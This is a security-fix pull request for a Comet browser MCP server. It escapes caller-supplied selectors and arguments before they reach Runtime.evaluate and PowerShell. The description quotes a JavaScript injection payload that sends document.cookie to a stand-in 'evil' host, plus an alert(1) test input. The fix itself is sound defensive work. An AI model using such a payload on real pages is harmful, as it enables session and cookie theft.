### PR TITLE
fix(security): sanitize template interpolation for Runtime.evaluate and PowerShell

### DIFF
--- a/src/cdp-client.ts
+++ b/src/cdp-client.ts
@@ -71,6 +71,16 @@ async function getWSLConnectPort(targetPort: number): Promise<number> {
   );
 }
 
+// Escape a string for safe interpolation inside a PowerShell single-quoted
+// literal: only `'` is special — double it to `''`. Also reject embedded
+// NUL or newline characters, which would terminate the command line.
+function psSingleQuote(value: string): string {
+  if (value.includes('\0') || /[\r\n]/.test(value)) {
+    throw new Error('Refusing to pass control characters to PowerShell');
+  }
+  return value.replace(/'/g, "''");
+}
+
 // Windows/WSL-compatible fetch using PowerShell
 // On WSL, native fetch connects to WSL's localhost, not Windows where Comet runs
 async function windowsFetch(url: string, method: string = 'GET'): Promise<{ ok: boolean; status: number; json: () => Promise<any> }> {
@@ -80,11 +90,26 @@ async function windowsFetch(url: string, method: string = 'GET'): Promise<{ ok: 
     return response;
   }
 
+  // Validate URL before passing through PowerShell: must be loopback http(s).
+  // This is the trust boundary — caller-supplied tabIds and ports flow here.
+  try {
+    const parsed = new URL(url);
+    if (parsed.protocol !== 'http:' && parsed.protocol !== 'https:') {
+      throw new Error(`Unsupported protocol: ${parsed.protocol}`);
+    }
+    if (parsed.hostname !== '127.0.0.1' && parsed.hostname !== 'localhost') {
+      throw new Error(`Refusing non-loopback host: ${parsed.hostname}`);
+    }
+  } catch (e: any) {
+    return { ok: false, status: 0, json: async () => { throw e; } };
+  }
+
   // On Windows or WSL, use PowerShell to reach Windows localhost
   try {
+    const safeUrl = psSingleQuote(url);
     const psCommand = method === 'PUT'
-      ? `Invoke-WebRequest -Uri '${url}' -Method PUT -UseBasicParsing | Select-Object -ExpandProperty Content`
-      : `Invoke-WebRequest -Uri '${url}' -UseBasicParsing | Select-Object -ExpandProperty Content`;
+      ? `Invoke-WebRequest -Uri '${safeUrl}' -Method PUT -UseBasicParsing | Select-Object -ExpandProperty Content`
+      : `Invoke-WebRequest -Uri '${safeUrl}' -UseBasicParsing | Select-Object -ExpandProperty Content`;
 
     const result = execSync(`powershell.exe -NoProfile -Command "${psCommand}"`, {
       encoding: 'utf8',
@@ -766,10 +791,20 @@ export class CometCDPClient {
         cometPath = 'C:\\Users\\' + (process.env.USER || 'user') + '\\AppData\\Local\\Perplexity\\Comet\\Application\\Comet.exe';
       }
 
+      // Validate port + path before interpolating into PowerShell.
+      // %LOCALAPPDATA% on Windows can legally contain `'` (rare but possible),
+      // and `port` is a typed number in TypeScript but the runtime cannot
+      // enforce that — explicit checks guard against shell injection.
+      if (!Number.isInteger(port) || port < 1 || port > 65535) {
+        throw new Error(`Invalid port for Comet launch: ${port}`);
+      }
+      const safeCometPath = psSingleQuote(cometPath);
+      const safePort = String(port);
+
       try {
         // Launch Comet via PowerShell
         // Use Set-Location to avoid UNC path issues when running from WSL
-        const psCommand = `Set-Location C:\\; Start-Process -FilePath '${cometPath}' -ArgumentList '--remote-debugging-port=${port}'`;
+        const psCommand = `Set-Location C:\\; Start-Process -FilePath '${safeCometPath}' -ArgumentList '--remote-debugging-port=${safePort}'`;
         spawn('powershell.exe', ['-NoProfile', '-Command', psCommand], {
           detached: true,
           stdio: 'ignore',
@@ -1265,10 +1300,11 @@ export class CometCDPClient {
         });
 
         // Trigger change event to notify the page
+        const safeSelector = JSON.stringify(selector || 'input[type="file"]');
         await this.client!.Runtime.evaluate({
           expression: `
             (function() {
-              const input = document.querySelector('${selector || 'input[type="file"]'}');
+              const input = document.querySelector(${safeSelector});
               if (input) {
                 input.dispatchEvent(new Event('change', { bubbles: true }));
                 input.dispatchEvent(new Event('input', { bubbles: true }));
@@ -1324,10 +1360,11 @@ export class CometCDPClient {
         });
 
         // Trigger change event
+        const safeSel = JSON.stringify(sel);
         await this.client!.Runtime.evaluate({
           expression: `
             (function() {
-              const input = document.querySelector('${sel}');
+              const input = document.querySelector(${safeSel});
               if (input) {
                 input.dispatchEvent(new Event('change', { bubbles: true }));
                 input.dispatchEvent(new Event('input', { bubbles: true }));
@@ -1393,11 +1430,12 @@ export class CometCDPClient {
       this.ensureConnected();
 
       const sel = selector || 'input[type="file"]';
+      const safeSel = JSON.stringify(sel);
 
       const result = await this.client!.Runtime.evaluate({
         expression: `
           (function() {
-            const input = document.querySelector('${sel}');
+            const input = document.querySelector(${safeSel});
             if (input) {
               input.click();
               return { clicked: true };

--- a/src/index.ts
+++ b/src/index.ts
@@ -647,12 +647,15 @@ server.setRequestHandler(CallToolRequestSchema, async (request) => {
         if (clickResult.success && clickResult.needsSelect) {
           // Wait for dropdown to open, then select the mode
           await new Promise(resolve => setTimeout(resolve, 300));
+          // `mode` was validated against modeMap above, but encode anyway to
+          // guarantee any future caller cannot inject JS via this template.
+          const safeMode = JSON.stringify(mode);
           const selectResult = await cometClient.evaluate(`
             (() => {
               // Look for dropdown menu items
               const items = document.querySelectorAll('[role="menuitem"], [role="option"], button');
               for (const item of items) {
-                if (item.innerText.toLowerCase().includes('${mode}')) {
+                if (item.innerText.toLowerCase().includes(${safeMode})) {
                   item.click();
                   return { success: true };
                 }


### PR DESCRIPTION
## Summary

Three injection sinks were reachable from MCP tool arguments. This PR closes all three with minimal, surgical changes.

### 1. CSS selector → `Runtime.evaluate` (CRITICAL)

`uploadFile` / `uploadFiles` / `clickFileInput` in `src/cdp-client.ts` interpolated the caller-supplied `selector` directly inside a single-quoted JS string:

```ts
const input = document.querySelector('${selector || 'input[type=\"file\"]'}');
```

A selector like `x'); fetch('http://evil/?c='+document.cookie); //` broke out of the JS string and ran in the page origin — access to the active Perplexity session, cookies, and DOM.

### 2. `comet_mode` arg → `Runtime.evaluate` (HIGH)

The narrow-screen dropdown fallback in `src/index.ts` re-used the raw `mode` argument inside the second `evaluate(...)` call:

```ts
if (item.innerText.toLowerCase().includes('${mode}')) { ... }
```

The enum check on `modeMap[mode]` happens before the first eval but the second block never re-validates — fragile contract that a future refactor could trivially break.

### 3. PowerShell URL/path interpolation (HIGH)

- `windowsFetch` interpolated `url` into `Invoke-WebRequest -Uri '${url}'`.
- `startComet` interpolated `cometPath` (from `%LOCALAPPDATA%`) and `port` into `Start-Process -FilePath '${cometPath}' -ArgumentList '--remote-debugging-port=${port}'`.

A single quote in any of these values (legal on Windows for usernames / paths, and trivially injectable into a future caller for URL) escaped the single-quoted PowerShell literal and permitted arbitrary commands.

## Fix

- Wrap caller-controlled interpolations into JS templates with `JSON.stringify(...)` — same pattern already used in `comet-ai.ts` for the `prompt` argument.
- Add `psSingleQuote()` helper: doubles `'` → `''` (PowerShell's literal-string escape) and rejects NUL/CR/LF. Applied at every PowerShell-bound interpolation.
- Validate URLs in `windowsFetch`: loopback http(s) only; non-loopback hosts and non-http(s) schemes are rejected before reaching PowerShell.
- Validate `port` is an integer in `[1, 65535]` before launching Comet.

## Compatibility

No public API changes. Typical inputs (`mode` from the documented enum, `selector` as a plain CSS selector, `port` as a positive integer, URLs targeting `127.0.0.1`) continue to work unchanged.

## Test plan

- [ ] Existing `npm run test:unit` passes
- [ ] Manual: `comet_upload` with a normal selector still works
- [ ] Manual: `comet_mode` switches modes on both wide and narrow viewports
- [ ] Manual: `comet_connect` launches Comet on Windows / WSL
- [ ] Adversarial: `comet_upload selector="'); alert(1); //"` no longer executes the payload (selector simply fails to match)

## Notes

Found while doing a deep audit of the repo. Two more PRs follow:
- correctness fixes (tabs-close count, stale-answer detection, Russian regex, `Finished` marker, domain match, WS leaks, version sync, `COMET_PORT` wiring)
- chore: drop unused `@anthropic-ai/sdk` dependency

🤖 Generated with [Claude Code](https://claude.com/claude-code)